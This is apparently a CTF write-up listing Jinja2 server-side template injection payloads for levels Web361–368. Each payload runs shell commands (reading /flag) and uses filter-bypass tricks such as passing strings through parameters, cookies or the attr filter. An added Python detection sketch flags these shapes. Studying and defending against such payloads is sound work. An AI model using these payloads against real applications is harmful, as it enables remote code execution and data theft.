Web361

payload

?name={{[].__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
// Note: for __subclasses__()[index], you need to find the index of os._wrap_close yourself

Web362

payload

?name={{s.__init__.__globals__['__builtins__'].eval('__import__("os").popen("cat /flag").read()')}}
// Note: watch out for single quotes and similar characters

Web363

payload

?name={{s.__init__.__globals__[request.args.p1].eval(request.args.p2)}}&p1=__builtins__&p2=__import__('os').popen('cat /flag').read()
// String escape: pass the strings in through the p1 and p2 parameters

Web364

payload

?name={{s.__init__.__globals__[request.cookies.p1].eval(request.cookies.p2)}}
Cookie values: p1: __builtins__ p2: __import__('os').popen('cat /flag').read()
// Escape: pass the filtered strings in through cookies

Web365

payload

?name={{s.__init__.__globals__.__getitem__(request.cookies.k1).eval(request.cookies.k2)}}
Cookie values: k1: __builtins__   k2: __import__('os').popen('cat /flag').read()
// Key point: __globals__['__builtins__'] is equivalent to __globals__.__getitem__('__builtins__')

Web366-367

payload

{{(x|attr(request.cookies.x1)|attr(request.cookies.x2)|attr(request.cookies.x3))(request.cookies.x4).eval(request.cookies.x5)}}
Cookie values: x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

Web368

payload

?name={%print((x|attr(request.cookies.k1)|attr(request.cookies.k2)|attr(request.cookies.k3))(request.cookies.k4).eval(request.cookies.k5))%}

Cookie values: k1=__init__;k2=__globals__;k3=__getitem__;k4=__builtins__;k5=__import__('os').popen('cat /flag').read()

Or
name={% print(lipsum|attr(request.values.a)).get(request.values.b).popen(request.values.c).read() %}&a=__globals__&b=os&c=cat /flag
// request.values.xxx accepts values sent via either POST or GET
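
Seen from the defending side, the levels above move the filtered strings out of `name` and into other parameters or cookies, so a check has to key on template syntax and correlate it with the rest of the request. The following detection sketch is an added example, not code from the original post or from the challenge; `inspect_request`, the reason labels and the sample requests are hypothetical and constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Jinja2 delimiters: a value that is plain data has no reason to carry them.
DELIMS = re.compile(r"\{\{|\{%")
# Shapes used by the payloads above: dunder walks, the |attr filter, and
# strings fetched from another part of the request to dodge a filter.
SIGNALS = {
    "dunder": re.compile(r"__\w+__"),
    "attr_filter": re.compile(r"\|\s*attr\s*\("),
    "request_indirection": re.compile(r"request\.(args|cookies|values)\b"),
}

def inspect_request(url, cookie_header=""):
    """Return a sorted list of reasons the request looks like an SSTI probe."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    reasons = set()
    for key, value in params:
        if DELIMS.search(value):
            reasons.add(f"template_syntax:{key}")
            reasons.update(n for n, rx in SIGNALS.items() if rx.search(value))
    if reasons:
        # Dunder strings elsewhere only matter once a parameter carries
        # template syntax that can reach them through request.*.
        cookies = [c.strip().partition("=")[::2]
                   for c in cookie_header.split(";") if c.strip()]
        for source, pairs in (("param", params), ("cookie", cookies)):
            for key, value in pairs:
                if SIGNALS["dunder"].search(value) and not DELIMS.search(value):
                    reasons.add(f"dunder_in_{source}:{key}")
    return sorted(reasons)

# Constructed requests (URL-encoded, harmless), one per payload shape.
SAMPLES = [
    ("/?name=alice", "sid=__x__"),
    ("/?name=%7B%7B%5B%5D.__class__.__bases__%7D%7D", ""),
    ("/?name=%7B%7Bx%7Cattr(request.cookies.x1)%7D%7D", "x1=__init__"),
    ("/?name=%7B%25print(lipsum%7Cattr(request.values.a))%25%7D&a=__globals__", ""),
]

if __name__ == "__main__":
    for url, cookie in SAMPLES:
        print(inspect_request(url, cookie), url)
```

Matching only on the filtered strings misses the later levels, where the template parameter carries none of them. The durable fix is still to pass user input as a template variable instead of compiling it as template source.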
Last modified: July 17, 2022